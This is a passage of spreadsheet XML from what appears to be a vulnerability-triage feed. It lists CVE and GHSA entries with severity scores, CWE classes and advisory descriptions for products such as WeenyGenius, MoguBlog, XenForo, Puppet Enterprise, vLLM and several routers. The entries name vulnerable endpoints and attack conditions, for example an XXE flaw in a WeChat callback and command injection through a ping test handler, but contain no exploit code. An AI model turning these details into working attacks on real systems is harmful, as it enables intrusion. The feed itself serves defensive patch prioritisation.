        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89176</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr"/>
      <c r="K194" s="5" t="inlineStr"/>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr"/>
      <c r="Q194" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>WeenyGenius, a computer lab management system developed by Howyar Technologies, has a Missing Authentication vulnerability. Unauthenticated attackers on the same network can easily spoof student or teacher endpoints. Impersonating a student can disrupt normal classroom operations, whereas impersonating a teacher can induce student computers to initiate connections, thereby gaining remote control over the student endpoints.</t>
        </is>
      </c>
      <c r="S194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89176</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89177</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr"/>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr"/>
      <c r="Q195" s="5" t="inlineStr">
        <is>
          <t>CWE-757</t>
        </is>
      </c>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>WeenyGenius, a computer lab management system by Howyar Technologies, has a Use of Insecure Protocol vulnerability. Due to the reliance on ZMTP Null mode, unauthenticated attackers on the same network can capture packets to leak transmitted data, or perform replay attacks with forged commands to disrupt classroom operations.</t>
        </is>
      </c>
      <c r="S195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89177</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89178</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr"/>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr"/>
      <c r="Q196" s="5" t="inlineStr">
        <is>
          <t>CWE-940</t>
        </is>
      </c>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>WeenyGenius, a computer lab management system by Howyar Technologies, has an Origin Validation Error vulnerability. Unauthenticated attackers on the same network can spoof the teacher workstation and send broadcast packets, causing student computers to attempt to establish a connection with the attacker.</t>
        </is>
      </c>
      <c r="S196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89178</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89250</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr"/>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr"/>
      <c r="Q197" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains an unauthenticated file read vulnerability in the getRecordedFile.php endpoint that streams recorded FLV files from the temporary directory. Attackers can request the endpoint with a known or guessed stream key to download recorded live video files without authentication or authorization checks.</t>
        </is>
      </c>
      <c r="S197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89250</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89260</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr"/>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr"/>
      <c r="Q198" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>MoguBlog through 6.2 contains an XML external entity injection vulnerability in the WeChat callback handler at POST /wechat/wechatCheck. The WechatRestApi.index() method passes the raw request body to SignUtil.xmlToMap(), which uses an unhardened dom4j SAXReader without DTD or external-entity restrictions. Unauthenticated remote attackers can submit DOCTYPE declarations with external parameter entities to read arbitrary local files or trigger outbound HTTP requests, with resolved entities reflected in error responses.</t>
        </is>
      </c>
      <c r="S198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89260</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89262</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr"/>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr"/>
      <c r="Q199" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>MoguBlog through 6.2 contains an authorization bypass vulnerability in the comment deletion endpoint that performs ownership checks against request-body fields instead of the authenticated principal. Attackers can delete arbitrary comments and their replies by supplying comment UIDs and author UIDs obtained from unauthenticated listing endpoints.</t>
        </is>
      </c>
      <c r="S199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89262</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90444</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr"/>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr"/>
      <c r="Q200" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>A file-transfer interface that requires valid credentials accepts attacker-controlled filenames without restricting shell metacharacters. An automated process later constructs and runs a system command using the uploaded file's name, allowing an authenticated attacker to embed and execute arbitrary operating system commands with the privileges of that process. This allows an attacker to read and modify ingested log data, and could provide a foothold for further movement within the internal network.</t>
        </is>
      </c>
      <c r="S200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90444</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>GHSA-78fp-cf4h-g36p</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="inlineStr"/>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr">
        <is>
          <t>pip:vllm</t>
        </is>
      </c>
      <c r="M201" s="5" t="inlineStr">
        <is>
          <t>0.13.0</t>
        </is>
      </c>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr"/>
      <c r="P201" s="5" t="inlineStr"/>
      <c r="Q201" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-787</t>
        </is>
      </c>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-mcmc-2m55-j8jj. This link is maintained to preserve external references.
### Original Description
vLLM versions &gt;= 0.10.2 and &lt; 0.13.0 are missing sparse tensor validation in multimodal embeddings processing. Because PyTorch disables sparse tensor invariant checks by default, an attacker can submit crafted embedding requests with malformed (negative or out-of-bounds) tensor indices, when the prompt-embeds feature is enabled, to trigger crashes or resource exhaustion (denial of service), with potential for out-of-bounds/write-what-where memory corruption. This continues CVE-2025-62164, whose prior fix only disabled the feature by default rather than addressing the root cause.</t>
        </is>
      </c>
      <c r="S201" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-78fp-cf4h-g36p</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38058</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr"/>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr"/>
      <c r="Q202" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>The endpoint on the iDirect iQ200 VSAT terminal returns the complete device configuration as JSON, including the SECURITY section which contains MD5-crypt password hashes for the root SSH and web administration accounts. Any user with valid web credentials can extract these hashes and crack them offline using commodity hardware.</t>
        </is>
      </c>
      <c r="S202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38058</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74239</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr"/>
      <c r="K203" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L203" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr"/>
      <c r="Q203" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a path traversal vulnerability in the style archive importer on Windows deployments that allows authenticated non-super administrators with style permissions to write arbitrary files outside the intended extraction directory by using backslash-based traversal sequences in ZIP member names. Attackers can craft a malicious ZIP archive with backslash path separators that bypass forward-slash validation to write arbitrary bytes to any web-server-writable path, including the public web root, achieving persistent code execution as the web-server account.</t>
        </is>
      </c>
      <c r="S203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74239</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76199</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr"/>
      <c r="K204" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr"/>
      <c r="Q204" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by an Uncontrolled Search Path Element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S204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76199</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79698</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr"/>
      <c r="Q205" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Advantech WISE-6610-NB, WISE-6610-EB, WISE-6610-TB, WISE-6610-JB, WISE-6610-CB, WISE-6610-EL-NB, WISE-6610-EL-EB, WISE-6610-EL-TB, WISE-6610-EL-JB, WISE-6610-EL-CB, WISE-6610P-DEA, WISE-6610P-DNA and WISE-6610P-DTA 1.2.1_20251110. This vulnerability affects the function nodered_lib_apply of the component Node-RED Library. Such manipulation of the argument act leads to command injection. The attack can be launched remotely. The exploit is publicly available and might be used. Upgrading to version 1.2.4_20260821 is able to resolve this issue. It is advisable to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.</t>
        </is>
      </c>
      <c r="S205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79698</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85979</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>security@puppet.com</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr"/>
      <c r="K206" s="5" t="inlineStr"/>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr"/>
      <c r="Q206" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-269, CWE-78</t>
        </is>
      </c>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>Affected versions of Puppet Enterprise contain a command injection vulnerability. An authenticated user with Puppet administrative privileges can inject arbitrary shell commands by providing a specially crafted value for this parameter, which is passed to a shell execution context without sufficient sanitization. Because the resulting commands are executed with root privileges, successful exploitation can lead to full compromise of the affected system. 
It affects Puppet Enterprise 2023.8.0 through 2023.8.10 and Puppet Enterprise 2025.0.0 through 2025.11.2.
This has been resolved in Puppet Enterprise 2023.8.11 and Puppet Enterprise 2025.11.3.</t>
        </is>
      </c>
      <c r="S206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85979</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86299</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr"/>
      <c r="K207" s="5" t="inlineStr"/>
      <c r="L207" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr"/>
      <c r="Q207" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Linksys RE7000 2.0.15. This affects the function platform_event_pingTest of the file /cgi-bin/json.cgi?PingTest of the component PingTest Handler. The manipulation of the argument pingTestIp/pingTestPktSize/pingTestTimes results in os command injection. The attack can be launched remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="S207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86299</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86509</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr"/>
      <c r="K208" s="5" t="inlineStr"/>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr"/>
      <c r="Q208" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in D-Link DIR-895L A1_102b07. This impacts the function sendOffer/sendACK of the file udhcpcd/serverpacket.c of the component udhcpcd. This manipulation causes stack-based buffer overflow. The attack can only be done within the local network. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="S208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86509</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70341</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr"/>
      <c r="K209" s="5" t="inlineStr"/>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr"/>
      <c r="Q209" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Edge (Chromium-based) allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70341</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7863</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr"/>
